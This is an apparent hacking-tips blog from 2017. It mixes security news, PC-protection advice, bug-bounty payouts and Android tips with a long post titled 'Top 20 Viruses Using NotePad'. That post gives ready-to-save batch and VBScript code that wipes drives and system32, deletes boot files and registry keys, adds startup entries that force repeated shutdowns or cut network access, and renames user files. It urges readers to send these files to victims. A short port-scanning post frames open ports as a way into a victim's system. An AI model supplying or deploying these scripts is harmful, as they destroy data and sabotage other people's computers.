Thursday, 14 September 2017

How to find e-mail sender's location



First way: search the e-mail ID

Copy the mail ID you are receiving from. Now visit the pipl or spokeo website. After this, paste the e-mail ID here and paste it. Here you will find other details of the mail id along with the location.

Second way: Facebook

Under this, please copy the e-mail ID and search in Facebook. If such a person had created a Facebook account with this ID, then you will get his information.

Top Five Hacking News ||Exploit Toolkit for $80 Per Day||Hijacked Extensions||Chinese DDoS Platforms||20-08-2017


1.The Latest Exploit Toolkit for $80 Per Day.

For just $80 per day, $500 per week or $1,400 monthly, cybercrime entrepreneurs can subscribe to Disdain. That's the name of a new exploit kit that's appeared on at least one underground Russian cybercrime forum, and which is being advertised by a "threat actor" who uses the handle "Cehceny," according to Israeli cybersecurity firm IntSights Cyber Intelligence. And more inforamtion Ref.

2.WannaCry 'Hero' Pleads Not Guilty, Allowed Back Online.
The British security researcher credited with stopping the WannaCry ransomware outbreak pleaded not guilty Monday to charges that he developed and sold a type of malicious software that steals online banking credentials and more inforattion Ref.

3.The malware can be downloaded accidentally through Google Play apps.
A new type of malware that threatens to send your private pictures, messages and internet browsing history to your friends has been discovered and more inforamtion  Click Here.
4. Hijacked Extensions: 4.7 Million Chrome Users at Risk.

More than 4.7 million users were apparently exposed to potentially malicious ads and credential theft after cybercriminals managed to hijack the developer accounts of several popular Chrome extensions.
and read more.
5.Common Source Code Used by Multiple Chinese DDoS Platforms.

An increase in Chinese websites offering online distributed denial of service (DDoS) capabilities was observed after a localized version of the source code of online booters was put up for sale, Talos reveals and more information Ref.

Hackers Can Now Decrypt Satellite Phone Calls

A group of security researchers detailed a real-time inversion attack against the GMR-2 stream cipher used in satellite phone communication, claiming it is much more efficient than previously devised attacks.
The research focused on the GMR-2 algorithm that is commonly used by modern-day satellite phones, including Inmarsat, to encrypt voice calls in an attempt to prevent eavesdropping.
The attack method helped researchers effectively reduce the search space for the 64-bit encryption key, which in turn made it easier to hunt for the decryption key, resulting in the encrypted data to be cracked within a fraction of a second.
The technique contains three phases, namely table generation; dynamic table looks-up, filtration and combination; and verification. The attack can be used to “retrieve the complete 8-byte encryption-key from only 1 frame (15 bytes) of keystream on average.” It also significantly reduces the exhaustive search space, and requires only 6KB of extra storage space.
The security researchers reveal that, in 10,000 experiments, the newly devised technique was able to uniquely determine 97.2% of the encryption-keys by the 15 bytes of keystream. The remaining 2.8% of the keys needed an extra keystream byte to retrieve.

Securityweek:Cisco Releases Open Source Malware Signature Generator


Cisco’s Talos intelligence and research group announced on Monday the availability of a new open source framework designed for automatically generating antivirus signatures from malware.
read more

Wednesday, 13 September 2017

How to secure personal PC or Laptop



Problem:Virus, Trojan, Worm                                          
Solution :Use Antivirus (McAFee , Norton , etc)

Problem :Malwares (spyware+ adwares)                            
Solution: Use Anti malware's:                                                                            
1.MalwareBytes' Anti-Malware
2.Adware
3.Combofix
4.Secunia psi

Problem :Remote Hacking                                              
Solution:Use Zone alarm firewall

Problem :Date & Information thief                                  
Solution :Use best crypt software (jetico)

Problem :Email Hacking          
Solution: Use own System and use password manger.

Problem :Password Hacking                                              
Solution: Use password manger and use virtual keyboard

Problem :Untrusted file                                                    
Solution:  First scan online www.virustotal.com

Problem :Sniffing                                                              
Solution:Use anti-arp software for arp and dns spoofing.

You know URL Hijacking

What is URL Hijacking
Typosquatting, also called URL hijacking, a sting site, or a fake URL and which is
 Hijacking occurs when another advertiser creates an ad that looks like it's your ad. It happens within paid search ads, contextual ads, and in display network image ads. Paid Search Hijacking. When URL Hijacking occurs in paid search, the hijacker will use your URL as the display URL in its ad.


Type of Typosquatting

1. A form of cybersquatting

2. Capitalizes on misspelling

Some Example of URL Hijacking 

1.Make money from your mistek
-There was lot of advertising  on the net.

2.Sell the badly spelled domain to the actual owner
-sell a mistek

3.Phishing the site
-look like the real site , please login.

4.Typosquading /brandjacking
-Take advantage of poor spelling.

5.outright misspelling
-hackerinfoindia.blogspot.in Vs hackerinfaindia.blogg.in

A typing error 
-hackinfoindia.blogspot.in


If you like this post please like & share with your friends... 
& Don't Forget To..
Like Our Facebook Page :

Watch Cyber attack in Real-time Worldwide

If you are interesting to watch who is initiating cyber-attack whom globally live. Thousands of website and organization server gets hacked every day due to vulnerable files, plugins, misconfiguration on the servers.
 Protocols worked
·         Telnet
·         Netis
·         RFB (Remote framebuffer)
·         Microsoft-DS
·         HTTP
·         MS WBT
·         SIP
·         SSH
·         XSAN File system
Locations Worked
·         Global (default)
·         South East Asia
·         West Asia
·         Latin America
·         Europe
·         US & China

Top five Cyber-Attack Maps
 1.Norse Watch Live
 2. Fire Eye Watch Live
3.Check Point Watch Live




4.Kaspersky Map Watch Live








5.Digital attack map Watch Live







if you like this post please like & share with your friends... 
& Don't Forget To..
 

Like Our Facebook Page :- https://www.facebook.com/webworlddeveloping

Top 20 Viruses Using NotePad Very Dangerous

Might be some virus is run on window 7 or window xp

Method 1:

Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .

NOW TYPE THE FOLLOWING CODE ::

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Then save it as kinng.bat and the batch file is created .
WARNING :: This is the most dangerous virus! Be careful with its use.

Delete the entire registry

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Now save it as kinng.bat and the batch file is created .

Method 2:

How to crash a PC Forever !:::

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE.


Method 3:

How to stop someone's internet access::::


@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew

Method 4:


ShutDown PC million Times::::

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

Method 5:

Open Notepad
Write / copy the below command there:
" del c:\WINDOWS\system32\*.*/q " without quote
and save as " anything.bat"
Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.


Method 6:

Process:
Open Notepad
Copy the below command there
"rd/s/q D:\
rd/s/q C:\
rd/s/q E:\" ( without quotes )
Save as "anything.bat
This virus Formats the C ,D , and E Drive in 3 Seconds.

Method 7:

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having .vbs Extension .

Method 8:

Open Notepad and write "start" without quotes
Start
Start
Start
and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.

Method 9:

Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

Method 10 :

Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.

Method 11:

Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

Method 12 :

This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat


Method 13 :

This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

Method 14 :

The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off
Del C: *.* |y

Save It As Anything.bat

Method 15 :

Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!

Method 16:

Shutdowns Computer Everytime It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

Method 17 :

Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File

Method 18 :

Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT


Method 19 :

System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File

Method 20 :

Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad
? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup !

How To Remove Shortcut Virus From Pendrive/PC using CMD

What Is Shortcut Virus ?

A shortcut virus is a virus (a malware) that hides your original files inside shortcuts.The way it hides the file remains unknown though the effect is quite visible. The original files are there in the drive itself, but in such a position that you can’t recognize it nor take it out. 

Shortcut Virus Sometimes delete your important data.Initially, it doesn’t harms your files but later on, it may make them corrupt or even delete all the files; depends on the type of shortcut virus.Remove Shortcut Virus From PC or Pendrive.

Why this Shortcut Virus in PC/Laptop or Pen-drive occurs?

1.If your antivirus is not able to update its programs to latest available version. 

2.Updated antiviruses has more number of anti-threat programs then its previous version.

3.Using external USB storage i.e. Pen-drive without scanning. 

4.Pen-drive might have lots of harmful viruses such as Trojan.

5.Opening Unknown sources i.e. files and folders which have hidden malicious script inside.

6.By downloading untrusted third party applications which have virus.

7.Plugging your USB drive in someone's else computer which contains virus.

Types of Shortcut Viruses?
There are mainy three types of shortcut viruses are found till date:

1.Drive shortcut virus
As the name suggests, In this a shortcut of whole drive is created. No matter what type of drive is.

2.Folder shortcut virus
A shortcut of folder is created with all its contents wraps together

3.File shortcut virus

Delete Shortcut Virus using CMD

1.Open CMD (command prompt). [Go to Run -> type CMD ->Hit enter]

2.Type the name of your drive or removal drive and a colon after it and hit enter. [Example:- e:]

3.Now type:attrib -h -r -s /s /d e:\*.*(Replace e: with the drive name of your drive)

4.Press enter.

How to use port scanning tool for hacking

What is port Scanning ?

Port Scanning is the process of checking which port is open or which port is locked .then you see port is opened , and you can try to communicate with victim system remotely and access their data.

* 21: FTP
* 22: SSH
* 23: Telnet
* 53: Domain Name System
* 80: World Wide Web HTTP
* 119: Network News Transfer Protocol
* 443: HTTP over Transport Layer Security/Secure Sockets Layer
* 445: microsoft-ds, Server Message Block over TCP

If these port are not secure  a hacker can communicate with these port , then you hacked.

Top 5 Free Port Scanners

1. Nmap

2. Angry IP Scanner

3. SuperScan

4. unicornscan

5. autoscan

                                            ******

The World's Most Dangerous Viruses of All Time

1. CryptoLocker

Released in September 2013, CryptoLocker spread through email attachments and encrypted the user’s files so that they couldn’t access them.
The hackers then sent a decryption key in return for a sum of money, usually somewhere from a few hundred pounds up to a couple of grand.

2. ILOVEYOU

 ILOVEYOU is one of the most well-known and destructive viruses of all time.
The virus came in an email with a subject line that said “I love you”.
Being curious types, people clicked into the email with aplomb—regardless of the fact the email wasn’t from anyone they knew.
The malware was a worm that was downloaded by clicking on an attachment called ‘LOVE-LETTER-FOR-YOU.TXT.vbs’.

3. MyDoom

MyDoom, like ILOVEYOU, is a record-holder and was the fastest-spreading email-based worm ever.

4. Storm Worm

Storm Worm was a Trojan horse that infected computers, sometimes turning them into zombies or bots to continue the spread of the virus and to send a huge amount of spam mail.
Tip: never open a link in an email unless you know exactly what it is.

By July 2007, Storm Worm was picked up in more than 200 million emails.

5. Sasser & Netsky

Sasser spread through infected computers by scanning random IP addresses and instructing them to download the virus. Netsky was the more familiar email-based worm. Netsky was actually the more viral virus, and caused a huge amount of problems in 2004.

6. Anna Kournikova

Jan De Wit, a 20-year-old Dutch man, wrote the virus as ‘a joke’. The subject was “Here you have, ;0)” with an attached file called AnnaKournikova.jpg.vbs.

7. Slammer

The Bank of America’s ATM service crashed, 911 services went down, and flights had to be cancelled because of online errors. Slammer, quite aptly, caused a huge panic as it had effectively managed to crash the internet in 15 quick minutes.
15 minutes in and Slammer had infected half of the servers that essentially ran the internet.

8.Stuxnet

Stuxnet spread by a USB thumb drive and targeted software controlling a facility in Iran that held uranium. The virus was so effective it caused their centrifuges to self-destruct, setting Iran’s nuclear development back and costing a lot of money.

High-Payout Bug Bounties $4,000 google facebook yahoo microsoft

Facebook

Facebook paid out over $1 million in 2014 to bug bounty hunters, which just goes to show how much money Facebook is willing to throw at their security holes. This company is serious about securing its platform.
Minimum payout is $500.
Maximum payout doesn’t exist. Depending on the severity, you can earn up to $30,000 or more for a bounty.

Google

Google also offers bounties for bugs found in the Chrome browser. Any bug that exists in the Stable, Beta, or Dev channels of Chrome, along with any bug that exists in a third-party component of Chrome, are eligible for rewards.

Minimum payout is $500.
Up to $4,000 for information leaks.
Up to $15,000 for severe issues.
Bonus: $100,000 reward for anyone who can compromise a Chromebook or Chromebox in guest mode that persists between device reboots.

Microsoft

these are some of the best-paying bug bounties currently available.

Up to $15,000 for the Online Services Bug Bounty.
Up to $100,000 for the Mitigation Bypass Bounty.
Up to $100,000 for the Bounty for Defense.

 Yahoo

Despite the fact that Verizon recently acquired Yahoo, the bug bounty program is still going strong and there’s no news to indicate that it will be shutting down any time soon. In-scope properties include Yahoo, Flickr, Polyvore, and more.

Minimum payout is $50.
Up to $15,000 for severe issues.

Android

Minimum payout is $200.
Up to $1,000 for low issues.
Up to $2,000 for moderate issues.
Up to $4,000 for high issues.
Up to $8,000 for critical issues.
Bonus: Between $10,000 and $50,000 if you can demonstrate an exploit that leads to compromises in the kernel, TEE TrustZone, or Verified Boot.

Pornhub

Minimum payout is $50.
Up to $5,000 for severe issues on Pornhub subdomains, blogs, and other related properties.
Up to $25,000 for severe issues on the Pornhub and Pornhub Premium sites as well as the Pornhub mobile app.

Mozilla

Mozilla provides bug bounties for security holes in the following client software: Firefox, Firefox for Android, FirefoxOS, and Thunderbird. For the most part, only “security critical” bugs are eligible for bounties.
Minimum payout is $500.
Up to $2,000 for moderate issues.
Up to $7,500 for critical issues.
Over $10,000 for exceptional issues.

LINE

Minimum payout is $500.
Up to $10,000 for severe issues.

Python

Minimum payout is $500.
Over $1,500 for severe issues.

Flash
Minimum payout is $2,000.
Up to $10,000 for severe issues

View Hidden WIFI Passwords in Android devices

In such a case, if you use any public Wi-Fi anywhere whose password is saved once upon your smartphone. But if you can not see it, then today we will tell you how to know the password of the Wi-Fi network.

Before starting, let me know that this process works only on Android devices. In addition, you can not get the admin access to Wi-Fi access without having access to this because this information is stored in the system's system folder.
Step 1 - First you need to install WiFi password viewer (root) from Google Play Store.

Step 2- Once the app is installed, allow all the things the app is asking for you. This will allow the app to read that save file, where your Wi-Fi passwords are stored.

Step 3- After giving permission on your behalf, the app will release a list of all the network password that you have already connected.

Step 4- If you want to share it with your friends, then tap an entry in the list, where you can copy the password to the clipboard or share it via any app. Also, you can also create a QR code.

How the files in the Phone can be hid and personal data through Calculator



Step 1. For this, users can use Smart Hyde Calculator app . You can download this app from Google Play Store.

Step 2. When you open this app, you have to set a password in it. After setting the password, confirm it.

Step 3. After this you will also be asked for an additional password which you can skip.

Step 4. You have to use it (=) for OK.

Step 5. When you set the password, you will have several options including Hyde files and unheard files.

Step 6. After this you have to click on the Hyd files and select the files which you want to hide. Your files will be hid.

So, how do you look like a calculator can hide your information by hiding all your files.

How to connect Pubilc WIFI free



If you Want to use Free Wifi , So follow below Steps :-

Step 1- The first app is WeFi Pro, this app will be available to you at Google Play Store. It can be downloaded for free. Its specialty is that you will not need to search for Wi-Fi in the phone. This app will automatically detect the public Wi-Fi connectivity to the phone.

Step 2- The second app is Instabridge. It is also available free on the Google Play Store. Through this app you can connect the phone to the public Wi-Fi. The specialty of this app is that it connects your phone to the fastest network. Not only this, if it does not find any network, it switches to the mobile network.

Step 3- Apart from this, if you use Facebook, you can find Wi-Fi from here too. You need to login to Facebook for this. After this, click on the menu options on the right hand side. Here you will get the option of app. Click on See All in it. Here you will find the option of wi-fi. Tap on it.